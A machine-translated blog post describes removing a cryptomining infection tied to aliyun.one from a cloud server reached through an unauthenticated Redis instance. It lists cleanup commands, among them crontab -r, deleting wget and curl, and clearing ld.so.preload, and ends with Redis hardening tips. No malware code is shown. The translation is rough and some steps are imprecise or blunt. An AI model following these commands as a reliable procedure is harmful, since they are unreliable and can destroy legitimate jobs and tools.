Ali cloud server planted a virus aliyun.one mining solution

Others 2020-03-18 16:38:43 views: null

Outline

A brief aliyun.one virus

Two virus removal strategy

III summarizes

 

A viral phenomenon

Phenomenon: The server cpu burst phenomenon is not high, but look at the system from top itop etc. How can the problem.

top

View crontab found Trojan planted by redis implantation (no password)

hosts crontab so modified mess. try to modify the crontab task, yet you modify it to be covered. Can not empty crontab. Everywhere the shadow of the script, the script should be all the time in the update synchronization scripts it.

 

Even if lucky enough to comment out after a while they will be covered by a new one

Trojan virus as follows:

Perform inside broiler crontab, so if there is trust in the user's host, and there are key words, so that even the master trust will become a chicken.

While it looks like he just timed to pull the script, but when he was ready to attack, modify the script after the nature of the content is different.


Because the root account can not delete the root account poisoning, you can not shovel out the machine.

 

Two ways to delete virus

First, the virus to be able to see the process through the top order

1 delete wget and curl the virus is no longer synchronized to the server.

2 needs to be emptied /etc/ld.so.preload file, and then execute the ldconfig command.

3 top command execution

4 found that there are two processes a scsi_eahc_1s cup full, and 9432671f5d kill off.

5 find / -name 9432671f5d find the relevant documents clear.

6  find .|xargs grep -ri "aliyun.one"

All killed.

crontab -r and delete the job, and so on have been found, including links to illegal domain name hosts are killed.

 

III summarizes 

After this experience by virus infection, feeling safe is very important.

Specific measures are as follows:

1 redis modify other default port is used to start and end open.

2 Set redis login password can not set up or use a simple password.

3 using the default simple modify other end open.

references

https://blog.csdn.net/xujiamin0022016/article/details/103319879

https://www.v2ex.com/amp/t/626230/2

https://blog.csdn.net/simplemurrina/article/details/103682389

https://blog.csdn.net/ruixue2016/article/details/80008766

woshini299cjr
Published 43 original articles · won praise 28 · views 40000 +
Private letter concerns

Guess you like

Origin blog.csdn.net/u013380694/article/details/103778618
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com